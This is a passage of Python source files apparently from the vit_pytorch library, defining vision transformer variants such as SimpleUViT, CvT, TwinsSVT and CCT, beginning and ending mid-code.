decoder_dim) self.to_pixels = nn.Linear(decoder_dim, pixel_values_per_patch) def forward(self, img): device = img.device # get patches patches = self.to_patch(img) batch, num_patches, *_ = patches.shape # patch to encoder tokens and add positions tokens = self.patch_to_emb(patches) if self.encoder.pool == "cls": tokens += self.encoder.pos_embedding[:, 1:(num_patches + 1)] elif self.encoder.pool == "mean": tokens += self.encoder.pos_embedding.to(device, dtype=tokens.dtype) # calculate of patches needed to be masked, and get random indices, dividing it up for mask vs unmasked num_masked = int(self.masking_ratio * num_patches) rand_indices = torch.rand(batch, num_patches, device = device).argsort(dim = -1) masked_indices, unmasked_indices = rand_indices[:, :num_masked], rand_indices[:, num_masked:] # get the unmasked tokens to be encoded batch_range = torch.arange(batch, device = device)[:, None] tokens = tokens[batch_range, unmasked_indices] # get the patches to be masked for the final reconstruction loss masked_patches = patches[batch_range, masked_indices] # attend with vision transformer encoded_tokens = self.encoder.transformer(tokens) # project encoder to decoder dimensions, if they are not equal - the paper says you can get away with a smaller dimension for decoder decoder_tokens = self.enc_to_dec(encoded_tokens) # reapply decoder position embedding to unmasked 
tokens unmasked_decoder_tokens = decoder_tokens + self.decoder_pos_emb(unmasked_indices) # repeat mask tokens for number of masked, and add the positions using the masked indices derived above mask_tokens = repeat(self.mask_token, 'd -> b n d', b = batch, n = num_masked) mask_tokens = mask_tokens + self.decoder_pos_emb(masked_indices) # concat the masked tokens to the decoder tokens and attend with decoder decoder_tokens = torch.zeros(batch, num_patches, self.decoder_dim, device=device) decoder_tokens[batch_range, unmasked_indices] = unmasked_decoder_tokens decoder_tokens[batch_range, masked_indices] = mask_tokens decoded_tokens = self.decoder(decoder_tokens) # splice out the mask tokens and project to pixel values mask_tokens = decoded_tokens[batch_range, masked_indices] pred_pixel_values = self.to_pixels(mask_tokens) # calculate reconstruction loss recon_loss = F.mse_loss(pred_pixel_values, masked_patches) return recon_loss File: vit_pytorch/simple_uvit.py import torch from torch import nn from torch.nn import Module, ModuleList from einops import rearrange, repeat, pack, unpack from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def exists(v): return v is not None def divisible_by(num, den): return (num % den) == 0 def posemb_sincos_2d(h, w, dim, temperature: int = 10000, dtype = torch.float32): y, x = torch.meshgrid(torch.arange(h), torch.arange(w), indexing="ij") assert divisible_by(dim, 4), "feature dimension must be multiple of 4 for sincos emb" omega = torch.arange(dim // 4) / (dim // 4 - 1) omega = temperature ** -omega y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim=1) return pe.type(dtype) # classes def FeedForward(dim, hidden_dim): return nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) class Attention(Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.depth = depth self.norm = nn.LayerNorm(dim) self.layers = ModuleList([]) for layer in range(1, depth + 1): latter_half = layer >= (depth / 2 + 1) self.layers.append(nn.ModuleList([ nn.Linear(dim * 2, dim) if latter_half else None, Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): skips = [] for ind, (combine_skip, attn, ff) in enumerate(self.layers): layer = ind + 1 first_half = layer <= (self.depth / 2) if first_half: skips.append(x) if exists(combine_skip): skip = skips.pop() skip_and_x = torch.cat((skip, x), dim = -1) x = combine_skip(skip_and_x) x = attn(x) + x x = ff(x) + x assert len(skips) == 0 return self.norm(x) class SimpleUViT(Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, num_register_tokens = 4, 
channels = 3, dim_head = 64): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert divisible_by(image_height, patch_height) and divisible_by(image_width, patch_width), 'Image dimensions must be divisible by the patch size.' patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange("b c (h p1) (w p2) -> b (h w) (p1 p2 c)", p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) pos_embedding = posemb_sincos_2d( h = image_height // patch_height, w = image_width // patch_width, dim = dim ) self.register_buffer('pos_embedding', pos_embedding, persistent = False) self.register_tokens = nn.Parameter(torch.randn(num_register_tokens, dim)) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.pool = "mean" self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, img): batch, device = img.shape[0], img.device x = self.to_patch_embedding(img) x = x + self.pos_embedding.type(x.dtype) r = repeat(self.register_tokens, 'n d -> b n d', b = batch) x, ps = pack([x, r], 'b * d') x = self.transformer(x) x, _ = unpack(x, ps, 'b * d') x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) # quick test on odd number of layers if __name__ == '__main__': v = SimpleUViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 7, heads = 16, mlp_dim = 2048 ).cuda() img = torch.randn(2, 3, 256, 256).cuda() preds = v(img) assert preds.shape == (2, 1000) File: vit_pytorch/cvt.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helper methods def group_dict_by_key(cond, d): return_val = [dict(), dict()] for key in d.keys(): match = bool(cond(key)) ind = int(not match) return_val[ind][key] = d[key] return (*return_val,) def group_by_key_prefix_and_remove_prefix(prefix, d): kwargs_with_prefix, kwargs = group_dict_by_key(lambda x: x.startswith(prefix), d) kwargs_without_prefix = dict(map(lambda x: (x[0][len(prefix):], x[1]), tuple(kwargs_with_prefix.items()))) return kwargs_without_prefix, kwargs # classes class LayerNorm(nn.Module): # layernorm, but done in the channel dimension #1 def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (var + self.eps).sqrt() * self.g + self.b class FeedForward(nn.Module): def __init__(self, dim, mult = 4, dropout = 0.): super().__init__() self.net = nn.Sequential( LayerNorm(dim), nn.Conv2d(dim, dim * mult, 1), nn.GELU(), nn.Dropout(dropout), nn.Conv2d(dim * mult, dim, 1), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class DepthWiseConv2d(nn.Module): def __init__(self, dim_in, dim_out, kernel_size, padding, stride, bias = True): super().__init__() self.net = nn.Sequential( nn.Conv2d(dim_in, dim_in, kernel_size = kernel_size, padding = padding, groups = dim_in, stride = stride, bias = bias), nn.BatchNorm2d(dim_in), nn.Conv2d(dim_in, dim_out, kernel_size = 1, bias = bias) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, proj_kernel, kv_proj_stride, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim 
= dim_head * heads padding = proj_kernel // 2 self.heads = heads self.scale = dim_head ** -0.5 self.norm = LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_q = DepthWiseConv2d(dim, inner_dim, proj_kernel, padding = padding, stride = 1, bias = False) self.to_kv = DepthWiseConv2d(dim, inner_dim * 2, proj_kernel, padding = padding, stride = kv_proj_stride, bias = False) self.to_out = nn.Sequential( nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): shape = x.shape b, n, _, y, h = *shape, self.heads x = self.norm(x) q, k, v = (self.to_q(x), *self.to_kv(x).chunk(2, dim = 1)) q, k, v = map(lambda t: rearrange(t, 'b (h d) x y -> (b h) (x y) d', h = h), (q, k, v)) dots = einsum('b i d, b j d -> b i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b i j, b j d -> b i d', attn, v) out = rearrange(out, '(b h) (x y) d -> b (h d) x y', h = h, y = y) return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, proj_kernel, kv_proj_stride, depth, heads, dim_head = 64, mlp_mult = 4, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, proj_kernel = proj_kernel, kv_proj_stride = kv_proj_stride, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_mult, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class CvT(nn.Module): def __init__( self, *, num_classes, s1_emb_dim = 64, s1_emb_kernel = 7, s1_emb_stride = 4, s1_proj_kernel = 3, s1_kv_proj_stride = 2, s1_heads = 1, s1_depth = 1, s1_mlp_mult = 4, s2_emb_dim = 192, s2_emb_kernel = 3, s2_emb_stride = 2, s2_proj_kernel = 3, s2_kv_proj_stride = 2, s2_heads = 3, s2_depth = 2, s2_mlp_mult = 4, s3_emb_dim = 384, s3_emb_kernel = 3, s3_emb_stride = 2, s3_proj_kernel = 3, s3_kv_proj_stride = 2, s3_heads = 6, s3_depth = 10, s3_mlp_mult = 4, dropout = 0., channels = 3 ): super().__init__() kwargs = dict(locals()) dim = channels layers = [] for prefix in ('s1', 's2', 's3'): config, kwargs = group_by_key_prefix_and_remove_prefix(f'{prefix}_', kwargs) layers.append(nn.Sequential( nn.Conv2d(dim, config['emb_dim'], kernel_size = config['emb_kernel'], padding = (config['emb_kernel'] // 2), stride = config['emb_stride']), LayerNorm(config['emb_dim']), Transformer(dim = config['emb_dim'], proj_kernel = config['proj_kernel'], kv_proj_stride = config['kv_proj_stride'], depth = config['depth'], heads = config['heads'], mlp_mult = config['mlp_mult'], dropout = dropout) )) dim = config['emb_dim'] self.layers = nn.Sequential(*layers) self.to_logits = nn.Sequential( nn.AdaptiveAvgPool2d(1), Rearrange('... 
() () -> ...'), nn.Linear(dim, num_classes) ) def forward(self, x): latents = self.layers(x) return self.to_logits(latents) File: vit_pytorch/simple_vit_with_qk_norm.py import torch from torch import nn import torch.nn.functional as F from einops import rearrange from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_2d(h, w, dim, temperature: int = 10000, dtype = torch.float32): y, x = torch.meshgrid(torch.arange(h), torch.arange(w), indexing="ij") assert (dim % 4) == 0, "feature dimension must be multiple of 4 for sincos emb" omega = torch.arange(dim // 4) / (dim // 4 - 1) omega = 1.0 / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim=1) return pe.type(dtype) # they use a query-key normalization that is equivalent to rms norm (no mean-centering, learned gamma), from vit 22B paper # in latest tweet, seem to claim more stable training at higher learning rates # unsure if this has taken off within Brain, or it has some hidden drawback class RMSNorm(nn.Module): def __init__(self, heads, dim): super().__init__() self.scale = dim ** 0.5 self.gamma = nn.Parameter(torch.ones(heads, 1, dim) / self.scale) def forward(self, x): normed = F.normalize(x, dim = -1) return normed * self.scale * self.gamma # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.q_norm = RMSNorm(heads, dim_head) self.k_norm = RMSNorm(heads, dim_head) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) q = self.q_norm(q) k = self.k_norm(k) dots = torch.matmul(q, k.transpose(-1, -2)) attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' 
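        # a minimal sketch of what the RMSNorm-based qk normalization above amounts to,
        # assuming q of shape (batch, heads, seq, dim_head); illustration only:
        #
        #   norm = RMSNorm(heads, dim_head)
        #   q = torch.randn(2, heads, 64, dim_head)
        #   out = norm(q)   # == F.normalize(q, dim = -1) * dim_head ** 0.5 * norm.gamma
        #
        # gamma is initialized to 1 / dim_head ** 0.5, so queries and keys start out
        # exactly l2-normalized and only acquire a learned per-head gain during training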
patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange("b c (h p1) (w p2) -> b (h w) (p1 p2 c)", p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embedding = posemb_sincos_2d( h = image_height // patch_height, w = image_width // patch_width, dim = dim, ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.pool = "mean" self.to_latent = nn.Identity() self.linear_head = nn.LayerNorm(dim) def forward(self, img): device = img.device x = self.to_patch_embedding(img) x += self.pos_embedding.to(device, dtype=x.dtype) x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/twins_svt.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helper methods def group_dict_by_key(cond, d): return_val = [dict(), dict()] for key in d.keys(): match = bool(cond(key)) ind = int(not match) return_val[ind][key] = d[key] return (*return_val,) def group_by_key_prefix_and_remove_prefix(prefix, d): kwargs_with_prefix, kwargs = group_dict_by_key(lambda x: x.startswith(prefix), d) kwargs_without_prefix = dict(map(lambda x: (x[0][len(prefix):], x[1]), tuple(kwargs_with_prefix.items()))) return kwargs_without_prefix, kwargs # classes class Residual(nn.Module): def __init__(self, fn): super().__init__() self.fn = fn def forward(self, x, **kwargs): return self.fn(x, **kwargs) + x class LayerNorm(nn.Module): def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (var + self.eps).sqrt() * self.g + self.b class FeedForward(nn.Module): def __init__(self, dim, mult = 4, dropout = 0.): super().__init__() self.net = nn.Sequential( LayerNorm(dim), nn.Conv2d(dim, dim * mult, 1), nn.GELU(), nn.Dropout(dropout), nn.Conv2d(dim * mult, dim, 1), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class PatchEmbedding(nn.Module): def __init__(self, *, dim, dim_out, patch_size): super().__init__() self.dim = dim self.dim_out = dim_out self.patch_size = patch_size self.proj = nn.Sequential( LayerNorm(patch_size ** 2 * dim), nn.Conv2d(patch_size ** 2 * dim, dim_out, 1), LayerNorm(dim_out) ) def forward(self, fmap): p = self.patch_size fmap = rearrange(fmap, 'b c (h p1) (w p2) -> b (c p1 p2) h w', p1 = p, p2 = p) return self.proj(fmap) class PEG(nn.Module): def __init__(self, dim, kernel_size = 3): super().__init__() self.proj = Residual(nn.Conv2d(dim, dim, kernel_size = kernel_size, padding = kernel_size // 2, groups = dim, stride = 1)) def forward(self, x): return self.proj(x) class LocalAttention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0., patch_size = 7): super().__init__() inner_dim = dim_head * heads self.patch_size = patch_size self.heads = heads self.scale = dim_head ** -0.5 self.norm = LayerNorm(dim) self.to_q = nn.Conv2d(dim, inner_dim, 1, bias = False) self.to_kv = nn.Conv2d(dim, inner_dim * 2, 1, bias = False) self.to_out = nn.Sequential( nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, fmap): fmap = self.norm(fmap) shape, p = fmap.shape, self.patch_size b, n, x, y, h = *shape, self.heads x, y = map(lambda t: t // 
p, (x, y)) fmap = rearrange(fmap, 'b c (x p1) (y p2) -> (b x y) c p1 p2', p1 = p, p2 = p) q, k, v = (self.to_q(fmap), *self.to_kv(fmap).chunk(2, dim = 1)) q, k, v = map(lambda t: rearrange(t, 'b (h d) p1 p2 -> (b h) (p1 p2) d', h = h), (q, k, v)) dots = einsum('b i d, b j d -> b i j', q, k) * self.scale attn = dots.softmax(dim = - 1) out = einsum('b i j, b j d -> b i d', attn, v) out = rearrange(out, '(b x y h) (p1 p2) d -> b (h d) (x p1) (y p2)', h = h, x = x, y = y, p1 = p, p2 = p) return self.to_out(out) class GlobalAttention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0., k = 7): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = LayerNorm(dim) self.to_q = nn.Conv2d(dim, inner_dim, 1, bias = False) self.to_kv = nn.Conv2d(dim, inner_dim * 2, k, stride = k, bias = False) self.dropout = nn.Dropout(dropout) self.to_out = nn.Sequential( nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): x = self.norm(x) shape = x.shape b, n, _, y, h = *shape, self.heads q, k, v = (self.to_q(x), *self.to_kv(x).chunk(2, dim = 1)) q, k, v = map(lambda t: rearrange(t, 'b (h d) x y -> (b h) (x y) d', h = h), (q, k, v)) dots = einsum('b i d, b j d -> b i j', q, k) * self.scale attn = dots.softmax(dim = -1) attn = self.dropout(attn) out = einsum('b i j, b j d -> b i d', attn, v) out = rearrange(out, '(b h) (x y) d -> b (h d) x y', h = h, y = y) return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads = 8, dim_head = 64, mlp_mult = 4, local_patch_size = 7, global_k = 7, dropout = 0., has_local = True): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Residual(LocalAttention(dim, heads = heads, dim_head = dim_head, dropout = dropout, patch_size = local_patch_size)) if has_local else nn.Identity(), Residual(FeedForward(dim, mlp_mult, dropout = dropout)) if has_local else nn.Identity(), Residual(GlobalAttention(dim, heads = heads, dim_head = dim_head, dropout = dropout, k = global_k)), Residual(FeedForward(dim, mlp_mult, dropout = dropout)) ])) def forward(self, x): for local_attn, ff1, global_attn, ff2 in self.layers: x = local_attn(x) x = ff1(x) x = global_attn(x) x = ff2(x) return x class TwinsSVT(nn.Module): def __init__( self, *, num_classes, s1_emb_dim = 64, s1_patch_size = 4, s1_local_patch_size = 7, s1_global_k = 7, s1_depth = 1, s2_emb_dim = 128, s2_patch_size = 2, s2_local_patch_size = 7, s2_global_k = 7, s2_depth = 1, s3_emb_dim = 256, s3_patch_size = 2, s3_local_patch_size = 7, s3_global_k = 7, s3_depth = 5, s4_emb_dim = 512, s4_patch_size = 2, s4_local_patch_size = 7, s4_global_k = 7, s4_depth = 4, peg_kernel_size = 3, dropout = 0. 
): super().__init__() kwargs = dict(locals()) dim = 3 layers = [] for prefix in ('s1', 's2', 's3', 's4'): config, kwargs = group_by_key_prefix_and_remove_prefix(f'{prefix}_', kwargs) is_last = prefix == 's4' dim_next = config['emb_dim'] layers.append(nn.Sequential( PatchEmbedding(dim = dim, dim_out = dim_next, patch_size = config['patch_size']), Transformer(dim = dim_next, depth = 1, local_patch_size = config['local_patch_size'], global_k = config['global_k'], dropout = dropout, has_local = not is_last), PEG(dim = dim_next, kernel_size = peg_kernel_size), Transformer(dim = dim_next, depth = config['depth'], local_patch_size = config['local_patch_size'], global_k = config['global_k'], dropout = dropout, has_local = not is_last) )) dim = dim_next self.layers = nn.Sequential( *layers, nn.AdaptiveAvgPool2d(1), Rearrange('... () () -> ...'), nn.Linear(dim, num_classes) ) def forward(self, x): return self.layers(x) File: vit_pytorch/cct.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) # CCT Models __all__ = ['cct_2', 'cct_4', 'cct_6', 'cct_7', 'cct_8', 'cct_14', 'cct_16'] def cct_2(*args, **kwargs): return _cct(num_layers=2, num_heads=2, mlp_ratio=1, embedding_dim=128, *args, **kwargs) def cct_4(*args, **kwargs): return _cct(num_layers=4, num_heads=2, mlp_ratio=1, embedding_dim=128, *args, **kwargs) def cct_6(*args, **kwargs): return _cct(num_layers=6, num_heads=4, mlp_ratio=2, embedding_dim=256, *args, **kwargs) def cct_7(*args, **kwargs): return _cct(num_layers=7, num_heads=4, mlp_ratio=2, embedding_dim=256, *args, **kwargs) def cct_8(*args, **kwargs): return _cct(num_layers=8, num_heads=4, mlp_ratio=2, embedding_dim=256, *args, **kwargs) def cct_14(*args, **kwargs): return _cct(num_layers=14, num_heads=6, mlp_ratio=3, embedding_dim=384, *args, **kwargs) def cct_16(*args, **kwargs): return _cct(num_layers=16, num_heads=6, mlp_ratio=3, embedding_dim=384, *args, **kwargs) def _cct(num_layers, num_heads, mlp_ratio, embedding_dim, kernel_size=3, stride=None, padding=None, *args, **kwargs): stride = default(stride, max(1, (kernel_size // 2) - 1)) padding = default(padding, max(1, (kernel_size // 2))) return CCT(num_layers=num_layers, num_heads=num_heads, mlp_ratio=mlp_ratio, embedding_dim=embedding_dim, kernel_size=kernel_size, stride=stride, padding=padding, *args, **kwargs) # positional def sinusoidal_embedding(n_channels, dim): pe = torch.FloatTensor([[p / (10000 ** (2 * (i // 2) / dim)) for i in range(dim)] for p in range(n_channels)]) pe[:, 0::2] = torch.sin(pe[:, 0::2]) pe[:, 1::2] = torch.cos(pe[:, 1::2]) return rearrange(pe, '... 
-> 1 ...') # modules class Attention(nn.Module): def __init__(self, dim, num_heads=8, attention_dropout=0.1, projection_dropout=0.1): super().__init__() self.heads = num_heads head_dim = dim // self.heads self.scale = head_dim ** -0.5 self.qkv = nn.Linear(dim, dim * 3, bias=False) self.attn_drop = nn.Dropout(attention_dropout) self.proj = nn.Linear(dim, dim) self.proj_drop = nn.Dropout(projection_dropout) def forward(self, x): B, N, C = x.shape qkv = self.qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) q = q * self.scale attn = einsum('b h i d, b h j d -> b h i j', q, k) attn = attn.softmax(dim=-1) attn = self.attn_drop(attn) x = einsum('b h i j, b h j d -> b h i d', attn, v) x = rearrange(x, 'b h n d -> b n (h d)') return self.proj_drop(self.proj(x)) class TransformerEncoderLayer(nn.Module): """ Inspired by torch.nn.TransformerEncoderLayer and rwightman's timm package. """ def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, attention_dropout=0.1, drop_path_rate=0.1): super().__init__() self.pre_norm = nn.LayerNorm(d_model) self.self_attn = Attention(dim=d_model, num_heads=nhead, attention_dropout=attention_dropout, projection_dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout1 = nn.Dropout(dropout) self.norm1 = nn.LayerNorm(d_model) self.linear2 = nn.Linear(dim_feedforward, d_model) self.dropout2 = nn.Dropout(dropout) self.drop_path = DropPath(drop_path_rate) self.activation = F.gelu def forward(self, src, *args, **kwargs): src = src + self.drop_path(self.self_attn(self.pre_norm(src))) src = self.norm1(src) src2 = self.linear2(self.dropout1(self.activation(self.linear1(src)))) src = src + self.drop_path(self.dropout2(src2)) return src class DropPath(nn.Module): def __init__(self, drop_prob=None): super().__init__() self.drop_prob = float(drop_prob) def forward(self, x): batch, drop_prob, device, dtype = x.shape[0], self.drop_prob, x.device, x.dtype if drop_prob <= 0. 
or not self.training: return x keep_prob = 1 - self.drop_prob shape = (batch, *((1,) * (x.ndim - 1))) keep_mask = torch.zeros(shape, device = device).float().uniform_(0, 1) < keep_prob output = x.div(keep_prob) * keep_mask.float() return output class Tokenizer(nn.Module): def __init__(self, kernel_size, stride, padding, pooling_kernel_size=3, pooling_stride=2, pooling_padding=1, n_conv_layers=1, n_input_channels=3, n_output_channels=64, in_planes=64, activation=None, max_pool=True, conv_bias=False): super().__init__() n_filter_list = [n_input_channels] + \ [in_planes for _ in range(n_conv_layers - 1)] + \ [n_output_channels] n_filter_list_pairs = zip(n_filter_list[:-1], n_filter_list[1:]) self.conv_layers = nn.Sequential( *[nn.Sequential( nn.Conv2d(chan_in, chan_out, kernel_size=(kernel_size, kernel_size), stride=(stride, stride), padding=(padding, padding), bias=conv_bias), nn.Identity() if not exists(activation) else activation(), nn.MaxPool2d(kernel_size=pooling_kernel_size, stride=pooling_stride, padding=pooling_padding) if max_pool else nn.Identity() ) for chan_in, chan_out in n_filter_list_pairs ]) self.apply(self.init_weight) def sequence_length(self, n_channels=3, height=224, width=224): return self.forward(torch.zeros((1, n_channels, height, width))).shape[1] def forward(self, x): return rearrange(self.conv_layers(x), 'b c h w -> b (h w) c') @staticmethod def init_weight(m): if isinstance(m, nn.Conv2d): nn.init.kaiming_normal_(m.weight) class TransformerClassifier(nn.Module): def __init__(self, seq_pool=True, embedding_dim=768, num_layers=12, num_heads=12, mlp_ratio=4.0, num_classes=1000, dropout_rate=0.1, attention_dropout=0.1, stochastic_depth_rate=0.1, positional_embedding='sine', sequence_length=None, *args, **kwargs): super().__init__() assert positional_embedding in {'sine', 'learnable', 'none'} dim_feedforward = int(embedding_dim * mlp_ratio) self.embedding_dim = embedding_dim self.sequence_length = sequence_length self.seq_pool = seq_pool assert exists(sequence_length) or positional_embedding == 'none', \ f"Positional embedding is set to {positional_embedding} and" \ f" the sequence length was not specified." 
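        # a minimal usage sketch for the cct_* factory functions above, assuming the
        # default tokenizer settings; illustration only, in the spirit of the repo's
        # other quick tests:
        #
        #   model = cct_14(img_size = 224, n_conv_layers = 1, kernel_size = 7,
        #                  num_classes = 1000, positional_embedding = 'learnable')
        #   img = torch.randn(1, 3, 224, 224)
        #   preds = model(img)   # (1, 1000)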
if not seq_pool: sequence_length += 1 self.class_emb = nn.Parameter(torch.zeros(1, 1, self.embedding_dim), requires_grad=True) else: self.attention_pool = nn.Linear(self.embedding_dim, 1) if positional_embedding == 'none': self.positional_emb = None elif positional_embedding == 'learnable': self.positional_emb = nn.Parameter(torch.zeros(1, sequence_length, embedding_dim), requires_grad=True) nn.init.trunc_normal_(self.positional_emb, std=0.2) else: self.positional_emb = nn.Parameter(sinusoidal_embedding(sequence_length, embedding_dim), requires_grad=False) self.dropout = nn.Dropout(p=dropout_rate) dpr = [x.item() for x in torch.linspace(0, stochastic_depth_rate, num_layers)] self.blocks = nn.ModuleList([ TransformerEncoderLayer(d_model=embedding_dim, nhead=num_heads, dim_feedforward=dim_feedforward, dropout=dropout_rate, attention_dropout=attention_dropout, drop_path_rate=layer_dpr) for layer_dpr in dpr]) self.norm = nn.LayerNorm(embedding_dim) self.fc = nn.Linear(embedding_dim, num_classes) self.apply(self.init_weight) def forward(self, x): b = x.shape[0] if not exists(self.positional_emb) and x.size(1) < self.sequence_length: x = F.pad(x, (0, 0, 0, self.n_channels - x.size(1)), mode='constant', value=0) if not self.seq_pool: cls_token = repeat(self.class_emb, '1 1 d -> b 1 d', b = b) x = torch.cat((cls_token, x), dim=1) if exists(self.positional_emb): x += self.positional_emb x = self.dropout(x) for blk in self.blocks: x = blk(x) x = self.norm(x) if self.seq_pool: attn_weights = rearrange(self.attention_pool(x), 'b n 1 -> b n') x = einsum('b n, b n d -> b d', attn_weights.softmax(dim = 1), x) else: x = x[:, 0] return self.fc(x) @staticmethod def init_weight(m): if isinstance(m, nn.Linear): nn.init.trunc_normal_(m.weight, std=.02) if isinstance(m, nn.Linear) and exists(m.bias): nn.init.constant_(m.bias, 0) elif isinstance(m, nn.LayerNorm): nn.init.constant_(m.bias, 0) nn.init.constant_(m.weight, 1.0) # CCT Main model class CCT(nn.Module): def __init__( self, img_size=224, embedding_dim=768, n_input_channels=3, n_conv_layers=1, kernel_size=7, stride=2, padding=3, pooling_kernel_size=3, pooling_stride=2, pooling_padding=1, *args, **kwargs ): super().__init__() img_height, img_width = pair(img_size) self.tokenizer = Tokenizer(n_input_channels=n_input_channels, n_output_channels=embedding_dim, kernel_size=kernel_size, stride=stride, padding=padding, pooling_kernel_size=pooling_kernel_size, pooling_stride=pooling_stride, pooling_padding=pooling_padding, max_pool=True, activation=nn.ReLU, n_conv_layers=n_conv_layers, conv_bias=False) self.classifier = TransformerClassifier( sequence_length=self.tokenizer.sequence_length(n_channels=n_input_channels, height=img_height, width=img_width), embedding_dim=embedding_dim, 